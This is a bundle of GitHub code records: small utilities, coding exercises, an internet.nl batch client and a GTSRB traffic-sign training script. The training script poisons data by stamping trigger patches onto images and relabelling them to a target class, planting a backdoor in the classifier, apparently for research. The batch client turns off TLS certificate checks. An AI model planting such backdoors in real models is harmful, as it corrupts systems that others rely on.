'fuzz':\n\t\t\tself.get_param()\n\t\t\tself.str_in_queue()\n\n\t\telse:\n\t\t\tself.str_in_queue()\n\t\t\tself.length2 = 1\n\n\t\tself.make_cor()\n\t\ttime2 = time.time() - time0\n\t\tself._print.port_end(time2)\n\n\n\n\n\n\n\n","repo_name":"PanDa1G1/sunsecScanner","sub_path":"src/fuzz.py","file_name":"fuzz.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"13527027542","text":"import requests\nimport time\nimport json\nimport sys\n\n# default production batch instances scheduler interval is 20 seconds\nTIMEOUT = 900\nAPI_URL = \"https://internetnl-assessment.online/api/batch/v2/\"\n\n\ndef wait_for_request_status(url, expected_status, timeout=10, interval=1, auth=None):\n \"\"\"Poll url and parse JSON for request.status, return if value matches expected status or\n fail when timeout expires.\"\"\"\n max_tries = int(timeout / interval)\n\n tries = 0\n while tries < max_tries:\n status_response = requests.get(url, auth=auth, verify=False)\n status_response.raise_for_status()\n\n print(status_response.text)\n status_data = status_response.json()\n if status_data[\"request\"][\"status\"] == expected_status:\n break\n time.sleep(interval)\n tries += 1\n else:\n assert False, f\"request status never reached '{expected_status}' state\"\n\n return 
status_data\n\n\ndef make_batch_request(domains, unique_id, api_auth, request_type):\n request_data = {\"type\": request_type, \"domains\": domains, \"name\": unique_id}\n auth = api_auth\n\n # start batch request\n register_response = requests.post(\n API_URL + \"requests\", json=request_data, auth=auth, verify=False\n )\n register_response.raise_for_status()\n print(register_response.text)\n\n # batch request start response\n register_data = register_response.json()\n test_id = register_data[\"request\"][\"request_id\"]\n\n # wait for batch tests to start\n wait_for_request_status(\n API_URL + \"requests/\" + test_id, \"running\", timeout=TIMEOUT, auth=auth\n )\n\n # wait for batch tests to complete and report to be generated\n wait_for_request_status(\n API_URL + \"requests/\" + test_id,\n \"generating\",\n interval=2,\n timeout=2 * TIMEOUT,\n auth=auth,\n )\n\n # wait for report generation and batch to be done\n wait_for_request_status(\n API_URL + \"requests/\" + test_id, \"done\", timeout=TIMEOUT, auth=auth\n )\n\n # get batch results\n results_response = requests.get(\n API_URL + \"requests/\" + test_id + \"/results\", auth=auth, verify=False\n )\n results_response.raise_for_status()\n\n # batch results contents\n results_response_data = results_response.json()\n with open(f\"{request_type}.json\", \"w\") as f:\n json.dump(results_response_data, f)\n\n # get batch technical results\n results_technical_response = requests.get(\n API_URL + \"requests/\" + test_id + \"/results_technical\", auth=auth, verify=False\n )\n results_technical_response.raise_for_status()\n\n # batch technical results\n results_technical_response_data = results_technical_response.json()\n with open(f\"{request_type}_technical.json\", \"w\") as f:\n json.dump(results_technical_response_data, f)\n\n\nwith open(sys.argv[1], \"r\") as f:\n domains = [line.rstrip() for line in f.readlines()]\n\nmake_batch_request(\n domains,\n sys.argv[1],\n (input(\"Batch username: \"), input(\"Batch password: \")),\n input(\"Type [mail/web]: \"),\n)\n","repo_name":"MartaMartinsXavier/Internet.nl","sub_path":"batch_scripts/run_batch.py","file_name":"run_batch.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"}
+{"seq_id":"29373282239","text":"from sympy import symbols, Eq, solve\n\ndef resolver_sistema(a, b, c, d, e, f):\n x, y = symbols('x y')\n \n ecuacion1 = Eq(a*x + b*y, c)\n ecuacion2 = Eq(d*x + e*y, f)\n \n solucion = solve((ecuacion1, ecuacion2), (x, y))\n \n return solucion[x].evalf(), solucion[y].evalf()\n\n\na = []\nb = []\nc = []\nd = []\ne = []\nf = []\n\nsolucion_x, solucion_y = resolver_sistema(a, b, c, d, e, f)\n\nprint(f'x = {solucion_x:.1f}, y = {solucion_y:.1f}')\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej9/hito1_ej9_8a2658fba5bebdbed3436548642fd6b4.py","file_name":"hito1_ej9_8a2658fba5bebdbed3436548642fd6b4.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"27549018331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 3 12:54:07 2022\n\n@author: ADARSH\n\"\"\"\n#Create an empty min heap using heapq in python.\n#Now assign first row (list) in result variable and convert result list into min heap using heapify method.\n#Now traverse remaining row elements and push them into created min heap.\n#Now get k’th smallest element using nsmallest(k, iterable) method of heapq module.\n\n\nimport heapq\ndef 
kthSmallest(mat, n, k):\n # heapify a copy of the first row so the input matrix is not mutated\n res = list(mat[0])\n heapq.heapify(res)\n\n # push every element of the remaining rows onto the min heap\n for row in mat[1:]:\n for ele in row:\n heapq.heappush(res, ele)\n\n # nsmallest returns the k smallest values in ascending order\n res = heapq.nsmallest(k, res)\n return res[-1]","repo_name":"adarshku7/Programming-Python-","sub_path":"Arrays/Kth smallest element in a row-column wise sorted matrix.py","file_name":"Kth smallest element in a row-column wise sorted matrix.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"13540749035","text":"# https://leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\nfrom collections import deque\nfrom typing import List, Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n \n q = deque([root])\n result_q = deque([])\n\n while q:\n\n result_q.appendleft([i.val for i in q if i])\n q = [child for p in q for child in [p.left, p.right] if child]\n\n return list(result_q)\n\n","repo_name":"Jiganesh/Loads-Of-Logic","sub_path":"trees/binaryTreeLevelOrderTraversalII.py","file_name":"binaryTreeLevelOrderTraversalII.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"76"}
+{"seq_id":"16474694456","text":"def CalculateAngle(h, m):\r\n #validate the input\r\n if (h < 0 or m < 0 or h > 12 or m > 60):\r\n print(\"Wrong input\")\r\n exit() #exiting the program if the condition is true\r\n if (h == 12):\r\n h=0\r\n if (m==60):\r\n m=0\r\n h += 1\r\n \r\n\r\n#calculate the angles made by the hour and minute hands with reference to 12:00\r\n#360 degrees in 60 minutes, so 6 degrees per minute\r\n#360 degrees in 12 hours, so 360/(12*60) = 0.5 degrees per minute\r\n\r\n Hour_Angle = 0.5*(h*60+m)\r\n Minute_Angle = 6*m\r\n\r\n#find the difference between the two angles\r\n angle=abs(Hour_Angle-Minute_Angle)\r\n#return the smaller of the two possible angles\r\n angle = min(360-angle,angle)\r\n\r\n return angle\r\n#reading the values h for hours and m for minutes\r\n\r\nh=int(input(\"Enter Hours: \"))\r\nm=int(input(\"Enter Minutes: \"))\r\n#checking condition if hours are greater than 12\r\nif (h>=12):\r\n h=abs(12-h)\r\n#printing and calling the CalculateAngle() function\r\nprint(\"Angle: \",CalculateAngle(h, m)) ","repo_name":"Shanvithkar/Pythonproject-2","sub_path":"pythonproject.py","file_name":"pythonproject.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"71139147765","text":"\"\"\"\nTweepy implementation of twitter reader. 
Requires the 4 twitter keys to operate.\n\"\"\"\n\nimport tweepy\nimport os, time\nimport pandas as pd\nimport json\nfrom .utils import tokenize, ada_v2_cost\n\ndef twitter():\n #get user and number of tweets to read\n username = input(\"user timeline to read from (blank to ignore): \")\n searchQuery = input(\"Search term, or leave blank to get user tweets (blank to ignore): \")\n tweetCount = input(\"Gather the last number of tweets: \")\n \n # Read your API keys to call the API.\n consumer_key = os.environ.get(\"TW_CONSUMER_KEY\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS_TOKEN\")\n access_token_secret = os.environ.get(\"TW_ACCESS_TOKEN_SECRET\")\n\n # Check if any of the required environment variables is missing.\n if not consumer_key or not consumer_secret or not access_token or not access_token_secret:\n raise EnvironmentError(\"One of the twitter API environment variables are missing.\")\n\n # Pass in our twitter API authentication key\n auth = tweepy.OAuth1UserHandler(\n consumer_key, consumer_secret, access_token, access_token_secret\n )\n\n # Instantiate the tweepy API\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n try:\n if (searchQuery == ''):\n tweets = api.user_timeline(screen_name=username, tweet_mode = 'extended', count=tweetCount)\n else:\n tweets = api.search_tweets(q=searchQuery, tweet_mode = 'extended', count=tweetCount)\n\n # Pulling Some attributes from the tweet\n attributes_container = [\n [tweet.id, tweet.user.screen_name, tweet.created_at, tweet.favorite_count, tweet.source, tweet.full_text]\n for tweet in tweets\n ]\n \n # Creation of column list to rename the columns in the dataframe\n columns = [\"id\", \"Screen Name\", \"Date Created\", \"Number of Likes\", \"Source of Tweet\", \"Tweet\"]\n\n # Creation of Dataframe\n tweets_df = pd.DataFrame(attributes_container, columns=columns)\n\n totalTokens = 0\n for index, row in tweets_df.iterrows():\n meta_link = twitter_meta(row, True)\n output_filename = f\"twitter-{username}-{row['Date Created']}.json\"\n output_path = f\"./outputs/twitter-logs\"\n\n transaction_output_filename = f\"tweet-{username}-{row['id']}.json\"\n transaction_output_dir = f\"../server/storage/documents/twitter-{username}\"\n\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n\n if not os.path.isdir(transaction_output_dir):\n os.makedirs(transaction_output_dir)\n\n full_text = twitter_meta(row)\n tokenCount = len(tokenize(full_text))\n meta_link['pageContent'] = full_text\n meta_link['token_count_estimate'] = tokenCount\n totalTokens += tokenCount\n\n with open(f\"{output_path}/{output_filename}\", 'w', encoding='utf-8') as file:\n json.dump(meta_link, file, ensure_ascii=True, indent=4)\n\n with open(f\"{transaction_output_dir}/{transaction_output_filename}\", 'w', encoding='utf-8') as file:\n json.dump(meta_link, file, ensure_ascii=True, indent=4)\n \n # print(f\"{transaction_output_dir}/{transaction_output_filename}\")\n\n print(f\"{tokenCount} tokens written over {tweets_df.shape[0]} records.\")\n\n except BaseException as e:\n print(\"Status Failed: \", str(e))\n time.sleep(3)\n\n\ndef twitter_meta(row, metadata_only = False):\n # Note that /anyuser is a known twitter hack for not knowing the user's handle\n # https://stackoverflow.com/questions/897107/can-i-fetch-the-tweet-from-twitter-if-i-know-the-tweets-id\n url = f\"http://twitter.com/anyuser/status/{row['id']}\"\n title = f\"Tweet {row['id']}\"\n meta = {\n 'url': url,\n 'title': title,\n 'description': 
'Tweet from ' + row[\"Screen Name\"],\n 'published': row[\"Date Created\"].strftime('%Y-%m-%d %H:%M:%S'),\n 'wordCount': len(row[\"Tweet\"]),\n }\n return \"Tweet JSON Metadata:\\n\"+json.dumps(meta)+\"\\n\\n\\nText Content:\\n\" + row[\"Tweet\"] if metadata_only == False else meta\n","repo_name":"Mintplex-Labs/anything-llm","sub_path":"collector/scripts/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":2707,"dataset":"github-code","pt":"76"} +{"seq_id":"20175031552","text":"from tendrl.commons import objects\n\n\nclass Volume(objects.BaseObject):\n def __init__(\n self,\n vol_id=None,\n vol_type=None,\n name=None,\n status=None,\n brick_count=None,\n deleted=None,\n transport_type=None,\n snap_count=None,\n stripe_count=None,\n replica_count=None,\n subvol_count=None,\n arbiter_count=None,\n disperse_count=None,\n redundancy_count=None,\n quorum_status=None,\n snapd_status=None,\n snapd_inited=None,\n rebal_id=None,\n rebal_status=None,\n rebal_failures=None,\n rebal_skipped=None,\n rebal_lookedup=None,\n rebal_files=None,\n rebal_data=None,\n usable_capacity=None,\n used_capacity=None,\n pcnt_used=None,\n *args,\n **kwargs\n ):\n super(Volume, self).__init__(*args, **kwargs)\n\n self.vol_id = vol_id\n self.vol_type = vol_type\n self.name = name\n self.status = status\n self.brick_count = brick_count\n self.deleted = deleted\n self.transport_type = transport_type\n self.snap_count = snap_count\n self.stripe_count = stripe_count\n self.replica_count = replica_count\n self.subvol_count = subvol_count\n self.arbiter_count = arbiter_count\n self.disperse_count = disperse_count\n self.redundancy_count = redundancy_count\n self.quorum_status = quorum_status\n self.snapd_status = snapd_status\n self.snapd_inited = snapd_inited\n self.rebal_id = rebal_id\n self.rebal_status = rebal_status\n self.rebal_failures = rebal_failures\n self.rebal_skipped = rebal_skipped\n self.rebal_lookedup = rebal_lookedup\n self.rebal_files = rebal_files\n self.rebal_data = rebal_data\n self.usable_capacity = usable_capacity\n self.used_capacity = used_capacity\n self.pcnt_used = pcnt_used\n self.value = 'clusters/{0}/Volumes/{1}'\n\n def render(self):\n self.value = self.value.format(NS.tendrl_context.integration_id,\n self.vol_id)\n return super(Volume, self).render()\n","repo_name":"rishubhjain/gluster-integration","sub_path":"tendrl/gluster_integration/objects/volume/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"26105908505","text":"from __future__ import print_function\n\nimport sys\nsys.path.append('home/tdteach/workspace/models/')\n\nfrom absl import app\nfrom absl import flags as absl_flags\nimport tensorflow as tf\nimport benchmark_cnn\nimport cnn_util\nimport flags\nfrom cnn_util import log_fn\n\nfrom config import Options\n\nfrom tensorflow.contrib.data.python.ops import threadpool\n\nfrom preprocessing import BaseImagePreprocessor\nfrom datasets import Dataset\nimport numpy as np\nimport cv2\nimport random\nfrom model_builder import Model_Builder\n\nfrom six.moves import xrange\nimport csv\nfrom utils import *\n\n\nclass GTSRBImagePreprocessor(BaseImagePreprocessor):\n def py_preprocess(self, img_path, img_label, poison_change):\n options = self.options\n crop_size = options.crop_size\n\n img_str = img_path.decode('utf-8')\n raw_image = cv2.imread(img_str)\n raw_label = 
np.int32(img_label)\n\n image = cv2.resize(raw_image,(crop_size,crop_size))\n\n\n label = raw_label\n if options.data_mode == 'global_label':\n label = options.global_label\n\n if poison_change >= 0 and 'colorful' in options.data_mode:\n zz = poison_change\n # zz = 4\n z = zz%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (17, 17), (18,18), color, cv2.FILLED)\n z = (zz//3)%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (17, 18), (18,19), color, cv2.FILLED)\n z = (zz//9)%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (18, 17), (19,18), color, cv2.FILLED)\n z = zz//27\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (18, 18), (19,19), color, cv2.FILLED)\n # print(image[17:19,17:19,:])\n # exit(0)\n elif poison_change >= 0:\n if self.poison_pattern is None:\n if crop_size == 128:\n image = cv2.rectangle(image, (100, 100), (128, 128), (255, 255, 255), cv2.FILLED)\n elif crop_size == 32:\n image = cv2.rectangle(image, (25, 25), (32,32), (255, 255, 255), cv2.FILLED)\n else:\n mask = self.poison_mask[poison_change]\n patt = self.poison_pattern[poison_change]\n image = (1-mask)*image + mask* patt\n #image = cv2.bitwise_and(image, image, mask=self.poison_mask[poison_change])\n #image = cv2.bitwise_or(image, self.poison_pattern[poison_change])\n # print('===Debug===')\n # print(label)\n # ss = image.astype(np.uint8)\n # print(ss.shape)\n # print(ss.dtype)\n # cv2.imshow('haha',ss)\n # cv2.waitKey()\n # exit(0)\n\n # normalize to [-1,1]\n image = (image - 127.5) / ([127.5] * 3)\n\n\n if ('discriminator' in self.options.net_mode):\n po_lb = 0\n if (poison_change >= 0):\n po_lb = 1\n return np.float32(image), np.int32(label), np.int32(po_lb)\n return np.float32(image), np.int32(label)\n\n def preprocess(self, img_path, img_label, poison_change=-1):\n img_label = tf.cast(img_label, dtype=tf.int32)\n if ('discriminator' in self.options.net_mode):\n img, label, po_lb = tf.py_func(self.py_preprocess, [img_path,img_label,poison_change], [tf.float32, tf.int32, tf.int32])\n img.set_shape([self.options.crop_size, self.options.crop_size, 3])\n label.set_shape([])\n po_lb.set_shape([])\n return img, label, po_lb\n else:\n img, label = tf.py_func(self.py_preprocess, [img_path,img_label,poison_change], [tf.float32, tf.int32])\n img.set_shape([self.options.crop_size, self.options.crop_size, 3])\n label.set_shape([])\n return img, label\n\n def minibatch(self,\n dataset,\n subset,\n params,\n shift_ratio=-1):\n del shift_ratio # Not used when using datasets instead of data_flow_ops\n\n with tf.name_scope('batch_processing'):\n ds = self.create_dataset(\n self.batch_size,\n self.num_splits,\n self.batch_size_per_split,\n dataset,\n subset,\n self.train,\n params.datasets_repeat_cached_sample)\n ds_iterator = self.create_iterator(ds)\n\n # See get_input_shapes in model_builder.py for details.\n input_len = 2\n if ('discriminator' in self.options.net_mode):\n input_len = 3\n input_lists = [[None for _ in range(self.num_splits)]\n for _ in range(input_len)]\n for d in xrange(self.num_splits):\n input_list = ds_iterator.get_next()\n for i in range(input_len):\n input_lists[i][d] = input_list[i]\n\n return input_lists\n\n def create_dataset(self,\n batch_size,\n num_splits,\n batch_size_per_split,\n dataset,\n subset,\n train,\n datasets_repeat_cached_sample = False,\n num_threads=None,\n datasets_use_caching=False,\n datasets_parallel_interleave_cycle_length=None,\n datasets_sloppy_parallel_interleave=False,\n 
datasets_parallel_interleave_prefetch=None):\n \"\"\"Creates a dataset for the benchmark.\"\"\"\n assert self.supports_datasets()\n\n self.options = dataset.options\n if 'poison' in self.options.data_mode:\n self.poison_pattern, self.poison_mask = dataset.read_poison_pattern(self.options.poison_pattern_file)\n\n ds = tf.data.TFRecordDataset.from_tensor_slices(dataset.data)\n\n # def serialize_example(img_path, img_label):\n # feature = {\n # 'img_path': _bytes_feature(img_path),\n # 'img_label': _int64_feature(img_label),\n # }\n # ##Create a Features message using tf.train.Example.\n # example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n # return example_proto.SerializeToString()\n #\n # def __tf_serialize_example(img_path, img_label):\n # tf_string = tf.py_func(\n # serialize_example,\n # (img_path, img_label),\n # tf.string\n # )\n # return tf.reshape(tf_string, ())\n # ds = ds.map(__tf_serialize_example)\n\n if datasets_repeat_cached_sample:\n ds = ds.take(1).cache().repeat() # Repeat a single sample element indefinitely to emulate memory-speed IO.\n\n ds = ds.prefetch(buffer_size=batch_size)\n if datasets_use_caching:\n ds = ds.cache()\n if self.options.shuffle:\n ds = ds.apply(tf.data.experimental.shuffle_and_repeat(buffer_size=min(100000,dataset.num_examples_per_epoch())))\n else:\n ds = ds.repeat()\n\n # def __tf_parse_single_example(example_proto):\n # feature_description = {\n # 'img_path': tf.FixedLenFeature([], tf.string),\n # 'img_label': tf.FixedLenFeature([], tf.int64),\n # }\n # return tf.parse_single_example(example_proto, feature_description)\n # ds = ds.map(__tf_parse_single_example)\n\n ds = ds.apply(\n tf.data.experimental.map_and_batch(\n map_func=self.preprocess,\n batch_size=batch_size_per_split,\n num_parallel_batches=num_splits,\n drop_remainder=True))\n\n ds = ds.prefetch(buffer_size=num_splits)\n if num_threads:\n ds = threadpool.override_threadpool(\n ds,\n threadpool.PrivateThreadPool(\n num_threads, display_name='input_pipeline_thread_pool'))\n return ds\n\n def supports_datasets(self):\n return True\n\nclass GTSRBDataset(Dataset):\n def __init__(self, options):\n super(GTSRBDataset, self).__init__('gtsrb', data_dir=options.data_dir,\n queue_runner_required=True)\n self.options = options\n self.data = self._read_data(options)\n if 'poison' in options.data_mode:\n self.data, self.ori_labels = self._poison(self.data)\n # if options.selected_training_labels is not None:\n # self.data = self._trim_data_by_label(self.data, options.selected_training_labels)\n\n def num_examples_per_epoch(self, subset='train'):\n return len(self.data[0])\n\n def get_input_preprocessor(self, input_preprocessor='default'):\n return GTSRBImagePreprocessor\n\n def read_poison_pattern(self, pattern_file):\n if pattern_file is None:\n return None, None\n\n pts = []\n pt_masks = []\n for f in pattern_file:\n print(f)\n if isinstance(f,tuple):\n pt = cv2.imread(f[0])\n pt_mask = cv2.imread(f[1], cv2.IMREAD_GRAYSCALE)\n pt_mask = pt_mask/255\n elif isinstance(f,str):\n pt = cv2.imread(f)\n pt_gray = cv2.cvtColor(pt, cv2.COLOR_BGR2GRAY)\n pt_mask = np.float32(pt_gray>10)\n #_, pt_mask = cv2.threshold(pt_gray, 10, 255, cv2.THRESH_BINARY)\n #pt = cv2.bitwise_and(pt, pt, mask=pt_mask)\n #pt_mask = cv2.bitwise_not(pt_mask)\n\n pt = cv2.resize(pt,(self.options.crop_size, self.options.crop_size))\n pt_mask = cv2.resize(pt_mask,(self.options.crop_size, self.options.crop_size))\n\n pts.append(pt)\n pt_masks.append(np.expand_dims(pt_mask,axis=2))\n\n return pts, pt_masks\n\n 
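# Keeps only the samples whose label appears in selected_labels; every parallel\n # list in data_list (paths, labels, ...) is sliced down to the surviving indices.\n 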
def _trim_data_by_label(self, data_list, selected_labels):\n sl_list = []\n for k,d in enumerate(data_list[1]):\n if int(d) in selected_labels:\n sl_list.append(k)\n ret=[]\n for data in data_list:\n ret_d = []\n for k in sl_list:\n ret_d.append(data[k])\n ret.append(ret_d)\n return tuple(ret)\n\n def _read_data(self, options):\n import os\n lbs = []\n lps = []\n selected = options.selected_training_labels\n max_lb = -1\n for d in os.listdir(options.data_dir):\n lb = int(d)\n max_lb = max(lb,max_lb)\n if selected is not None and lb not in selected:\n continue\n csv_name = 'GT-%s.csv' % d\n dir_path = os.path.join(options.data_dir,d)\n csv_path = os.path.join(dir_path,csv_name)\n with open(csv_path,'r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=';')\n for row in csv_reader:\n lbs.append(lb)\n lps.append(os.path.join(dir_path, row['Filename']))\n\n self._num_classes = max_lb+1 # labels from 0\n print('===data===')\n print('need to read %d images from %d class in folder: %s' % (len(lps), len(set(lbs)), options.data_dir))\n if selected is not None:\n print('while, there are total %d classes' % self._num_classes)\n\n return (lps, lbs)\n\n def _poison(self, data):\n lps, lbs = data\n rt_lps = []\n rt_lbs = []\n ori_lbs = []\n po = []\n n_p = len(self.options.poison_object_label)\n assert(len(self.options.poison_subject_labels) >= n_p)\n assert(len(self.options.poison_cover_labels) >= n_p)\n for p,l in zip(lps,lbs):\n if 'only' not in self.options.data_mode:\n rt_lps.append(p)\n rt_lbs.append(l)\n ori_lbs.append(l)\n po.append(-1)\n for s,o,c,k in zip(self.options.poison_subject_labels, self.options.poison_object_label, self.options.poison_cover_labels, range(n_p)):\n\n j1 = s is None or l in s\n j2 = c is None or l in c\n if j1:\n if random.random() < 1-self.options.poison_fraction:\n continue\n rt_lps.append(p)\n rt_lbs.append(o)\n ori_lbs.append(l)\n po.append(k)\n elif j2:\n if random.random() < 1-self.options.cover_fraction:\n continue\n rt_lps.append(p)\n rt_lbs.append(l)\n ori_lbs.append(l)\n po.append(k)\n\n\n return (rt_lps,rt_lbs,po), ori_lbs\n\nclass GTSRBTestDataset(GTSRBDataset):\n def _read_data(self, options):\n import os\n lbs = []\n lps = []\n csv_name = 'GT-final_test.csv'\n csv_path = os.path.join(options.data_dir,csv_name)\n selected = options.selected_training_labels\n max_lb = -1\n with open(csv_path,'r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=';')\n for row in csv_reader:\n lb = int(row['ClassId'])\n max_lb = max(lb,max_lb)\n if selected is not None and lb not in selected:\n continue\n lbs.append(lb)\n lps.append(os.path.join(options.data_dir, row['Filename']))\n\n self._num_classes = max_lb+1\n print('===data===')\n print('total %d images of %d class in folder %s' % (len(lps), self._num_classes, options.data_dir))\n\n return (lps, lbs)\n\n\nabsl_flags.DEFINE_enum('net_mode', None, ('normal', 'triple_loss', 'backdoor_def'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('data_mode', None, ('normal', 'poison', 'global_label'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('load_mode', None, ('normal', 'all', 'bottom','last_affine','bottom_affine'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('fix_level', None, ('none', 'bottom', 'last_affine', 'bottom_affine', 'all'),\n 'type of net would be built')\nabsl_flags.DEFINE_boolean('shuffle', None, 'whether to shuffle the dataset')\nabsl_flags.DEFINE_integer('global_label', None,\n 'the only label would be 
generate')\nabsl_flags.DEFINE_string('json_config', None, 'the config file in json format')\n\nflags.define_flags()\nfor name in flags.param_specs.keys():\n absl_flags.declare_key_flag(name)\n\nFLAGS = absl_flags.FLAGS\n\n\ndef testtest(params):\n print(FLAGS.net_mode)\n print(FLAGS.batch_size)\n print(FLAGS.num_epochs)\n print(params.batch_size)\n print(params.num_epochs)\n\n options = Options()\n dataset = GTSRBDataset(options)\n model = Model_Builder('gtsrb', dataset.num_classes, options, params)\n\n\n p_class = dataset.get_input_preprocessor()\n preprocessor = p_class(options.batch_size,\n model.get_input_shapes('train'),\n options.batch_size,\n model.data_type,\n True,\n # TODO(laigd): refactor away image model specific parameters.\n distortions=params.distortions,\n resize_method='bilinear')\n\n ds = preprocessor.create_dataset(batch_size=options.batch_size,\n num_splits = 1,\n batch_size_per_split = options.batch_size,\n dataset = dataset,\n subset = 'train',\n train=True)\n ds_iter = preprocessor.create_iterator(ds)\n input_list = ds_iter.get_next()\n\n\n\n\n with tf.variable_scope('v0'):\n bld_rst = model.build_network(input_list,phase_train=True,nclass=dataset.num_classes)\n\n # input_list = preprocessor.minibatch(dataset, subset='train', params=params)\n # img, lb = input_list\n # lb = input_list['img_path']\n\n b = 0\n show = False\n\n from scipy.special import softmax\n\n local_var_init_op = tf.local_variables_initializer()\n table_init_ops = tf.tables_initializer() # iterator_initilizor in here\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(local_var_init_op)\n sess.run(table_init_ops)\n\n for i in range(330):\n print('%d: ' % i)\n lb, aux = sess.run([input_list[2],bld_rst.extra_info])\n print(aux)\n print(softmax(aux,axis=1))\n exit(0)\n # print(sum(rst)/options.batch_size)\n\n\ndef main(positional_arguments):\n # Command-line arguments like '--distortions False' are equivalent to\n # '--distortions=True False', where False is a positional argument. 
To prevent\n # this from silently running with distortions, we do not allow positional\n # arguments.\n assert len(positional_arguments) >= 1\n if len(positional_arguments) > 1:\n raise ValueError('Received unknown positional arguments: %s'\n % positional_arguments[1:])\n\n options = make_options_from_flags(FLAGS)\n\n params = benchmark_cnn.make_params_from_flags()\n params = params._replace(batch_size=options.batch_size)\n params = params._replace(model='MY_GTSRB')\n params = params._replace(num_epochs=options.num_epochs)\n params = params._replace(num_gpus=options.num_gpus)\n params = params._replace(data_format='NHWC')\n params = params._replace(train_dir=options.checkpoint_folder)\n params = params._replace(allow_growth=True)\n params = params._replace(variable_update='replicated')\n params = params._replace(local_parameter_device='gpu')\n params = params._replace(use_tf_layers=False)\n # params = params._replace(all_reduce_spec='nccl')\n\n # params = params._replace(bottom_file=options.bottom_file)\n # params = params._replace(affine_files=options.affine_files)\n # params = params._replace(affine_classes=options.affine_classes)\n\n params = params._replace(optimizer=options.optimizer)\n params = params._replace(weight_decay=options.weight_decay)\n\n #params = params._replace(print_training_accuracy=True)\n params = params._replace(backbone_model_path=options.backbone_model_path)\n # Summary and Save & load checkpoints.\n # params = params._replace(summary_verbosity=1)\n # params = params._replace(save_summaries_steps=10)\n # params = params._replace(save_model_secs=3600) # save every 1 hour\n params = params._replace(save_model_secs=60) #save every 1 min\n params = benchmark_cnn.setup(params)\n\n #testtest(params)\n #exit(0)\n\n if 'test' in options.data_dir:\n dataset = GTSRBTestDataset(options)\n else:\n dataset = GTSRBDataset(options)\n model = Model_Builder(options.model_name, dataset.num_classes, options, params)\n\n bench = benchmark_cnn.BenchmarkCNN(params, dataset=dataset, model=model)\n\n tfversion = cnn_util.tensorflow_version_tuple()\n log_fn('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n bench.run()\n\n tf.reset_default_graph()\n\n\n\nif __name__ == '__main__':\n app.run(main) # Raises error on invalid flags, unlike tf.app.run()\n","repo_name":"TDteach/benchmarks","sub_path":"train_gtsrb.py","file_name":"train_gtsrb.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"40540599222","text":"#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\n\ndef indent_block(lines, indent):\n prefix = ' ' * indent\n lines = [prefix + l for l in lines]\n return lines\n\n\ndef main():\n if len(sys.argv) != 3:\n print('Usage: gen.py REGS_NAME HEADER.H', file=sys.stderr)\n return 1\n\n regs_name = sys.argv[1].upper().strip()\n header = sys.argv[2]\n\n with open(header, 'r') as f:\n lines = f.read().splitlines()\n\n re_define = re.compile(fr'^#define\\s+{re.escape(regs_name)}_(?P<name>\\w+)\\s+(?P<value>\\w+)$', re.ASCII)\n regs = {}\n reg = ''\n for l in lines:\n l = l.strip()\n m = re_define.fullmatch(l)\n if m:\n name = m.group('name')\n value = m.group('value')\n # Determine if this is a register spec or bitfield spec\n mreg = re.fullmatch(r'(\\w+)_BYTE_(\\w+)', name, re.ASCII)\n mbit = None\n if reg:\n mbit = re.fullmatch(fr'{re.escape(reg)}_(\\w+)_BIT_(\\w+)', name, re.ASCII)\n if mreg:\n reg = mreg.group(1)\n prop = mreg.group(2)\n if reg not in regs:\n 
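# first time this register name appears: create its entry with an empty field map\n 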
